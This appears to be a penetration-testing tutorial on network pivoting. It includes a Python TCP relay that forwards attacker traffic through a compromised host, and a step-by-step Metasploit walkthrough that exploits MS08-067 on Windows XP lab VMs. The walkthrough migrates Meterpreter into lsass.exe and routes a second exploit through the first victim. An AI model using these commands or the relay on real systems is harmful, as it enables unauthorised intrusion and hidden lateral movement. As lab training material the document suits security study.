Overview
Pivoting is the practice of compromising one host on a network and then using that host as a launch point for attacks against other systems on the same network. Because the traffic now originates from an internal, trusted address, perimeter firewall policy that only screens inbound connections from outside no longer applies, and the attacker can reach services (internal file shares, management interfaces, hosts on private address ranges) that are never exposed at the perimeter. Launching attacks from an already-compromised system also improves the attacker's chances of staying undetected, since the perimeter sees nothing new and only the internal host's activity is left as evidence.
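Metasploit's route command, used in the walkthrough on this page, makes the Meterpreter session on the first victim proxy new connections to the second victim. The Python relay below is an added example, not code from the original page or from Metasploit, and shows that same mechanism stripped to its core: a listener on the compromised host forwards each inbound connection to an internal target that only the compromised host can reach, so the target sees the compromised host, not the attacker, as its client. The "internal service", the loopback addresses and the probe string are constructed for an offline demo and are assumptions, not anything taken from the page.

```python
"""Minimal TCP pivot relay: the mechanism behind "attacking from inside".

Added example, not code from the original page.  The relay stands in for
the foothold on the compromised host (what Metasploit does for you when a
route points through a Meterpreter session); the "internal service" is a
constructed stand-in for a host that only the compromised machine can reach.
Everything binds to loopback on ephemeral ports so it runs offline.
"""
import socket
import threading


def _pump(src, dst):
    """Copy bytes src -> dst until src hits EOF, then half-close dst."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _serve(listen_addr, handler):
    """Bind, listen, and hand every accepted connection to handler in a thread.
    Returns (listening_socket, bound_addr); port 0 picks a free port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(listen_addr)
    srv.listen(8)

    def accept_loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:      # listener closed: shut down quietly
                return
            conn.settimeout(5)
            threading.Thread(target=handler, args=(conn,), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv, srv.getsockname()


def start_pivot(listen_addr, target_addr):
    """Runs on the compromised host: every connection it accepts is relayed
    to target_addr, so the target sees the compromised host as the client."""
    def relay(client):
        try:
            target = socket.create_connection(target_addr, timeout=5)
        except OSError:
            client.close()       # target unreachable: drop the attacker's connection
            return
        up = threading.Thread(target=_pump, args=(client, target), daemon=True)
        up.start()
        _pump(target, client)    # returns once the target side closes
        up.join(timeout=5)
        client.close()
        target.close()
    return _serve(listen_addr, relay)


def start_internal_service(listen_addr):
    """Constructed stand-in for a service on the second victim: it tags and
    echoes whatever it receives, reporting which address connected to it."""
    def handle(conn):
        with conn:
            peer = conn.getpeername()[0]
            data = conn.recv(4096)
            conn.sendall(b"INTERNAL-SVC from " + peer.encode() + b": " + data)
    return _serve(listen_addr, handle)


def send_through_pivot(pivot_addr, request):
    """Attacker side: talk to the pivot exactly as if it were the target."""
    with socket.create_connection(pivot_addr, timeout=5) as s:
        s.sendall(request)
        s.shutdown(socket.SHUT_WR)
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def demo():
    """Wire all three roles on loopback and return what the attacker gets back."""
    svc, svc_addr = start_internal_service(("127.0.0.1", 0))
    piv, piv_addr = start_pivot(("127.0.0.1", 0), svc_addr)
    try:
        return send_through_pivot(piv_addr, b"probe from attacker")
    finally:
        piv.close()
        svc.close()


if __name__ == "__main__":
    print(demo())   # b'INTERNAL-SVC from 127.0.0.1: probe from attacker'
```

On a real engagement the relay would bind on the compromised host's internal interface and the attacker would connect to it from outside; the address the internal service reports is then the compromised host's, which is the whole point of pivoting. Meterpreter's portfwd command and the msfconsole route used on this page do the same job without you writing or uploading anything.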
Exploit
In the example pentest below, the goal is to exploit a host on the network, establish a Meterpreter session and migrate it into a stable system process, and then, using pivoting, exploit a second host on the network through the first.
Requirements: The exercise was conducted from the BackTrack 5 VMware virtual machine against two hosts running Windows XP Pro Service Pack 2.
Exploit steps:
- Open a terminal in BackTrack and start the Metasploit console:
- # msfconsole
- msf > show exploits
- msf > use windows/smb/ms08_067_netapi
- msf exploit(ms08_067_netapi) > show payloads
- msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
- msf exploit(ms08_067_netapi) > show options //check RHOST, RPORT and the payload's LPORT before launching
- msf exploit(ms08_067_netapi) > set RHOST <1st victim's ip address>
- msf exploit(ms08_067_netapi) > exploit //if the exploit succeeds you will see a meterpreter prompt
- meterpreter > //this prompt means you have a Meterpreter session on victim 1
- meterpreter > shell //drops you into a Windows command prompt on the victim
- C:\WINDOWS\system32> exit //leave the Windows command prompt and return to Meterpreter
- meterpreter > getpid //note the process ID Meterpreter is currently running in
- meterpreter > ps //list the running processes on the victim. Your PID will normally belong to the exploited service host, svchost.exe. Find "lsass.exe"; in this exercise it appeared as PID 700, but use whatever PID your own ps output shows
- meterpreter > migrate 700 //migrate Meterpreter into lsass.exe, a long-lived SYSTEM process, so the session survives if the exploited svchost is restarted or cleaned up. Caveat: lsass is critical, and if it crashes Windows reboots, so on a target you cannot afford to take down prefer a less critical SYSTEM process
- meterpreter > getpid //verify that the new process ID is the one you migrated to
- ctrl+z //press Ctrl+Z (or type background) to background the Meterpreter session; note the session number msfconsole reports
- msf > route add <2nd victim's ip address> <subnet mask> <session id #> //send traffic for victim 2 through the Meterpreter session on victim 1; route print shows the active routes
- msf > use windows/smb/ms08_067_netapi
- msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp //a bind payload is the simplest choice for a pivoted attack: victim 2 listens and msfconsole connects to it through the route, so victim 2 never has to reach the attacker's machine directly
- msf exploit(ms08_067_netapi) > set RHOST <2nd victim's ip address>
- msf exploit(ms08_067_netapi) > exploit
- meterpreter > //success: a Meterpreter session on victim 2, reached entirely through victim 1
Now that you have a meterpreter shell the sky is the limit. Run a help command to see all of the commands available to you. Try creating a directory or file on the victim machine, or uploading or downloading a file to and from the victim. Here are some of the basic meterpreter commands:
meterpreter > help //help menu
meterpreter > background //backgrounds the current session
meterpreter > exit //terminate the meterpreter session
meterpreter > quit //terminate the meterpreter session
meterpreter > write //writes data to a channel
meterpreter > mkdir //creates a directory
meterpreter > download //download a file or directory
meterpreter > upload //upload a file or directory
meterpreter > search //search for a file
Video Tutorial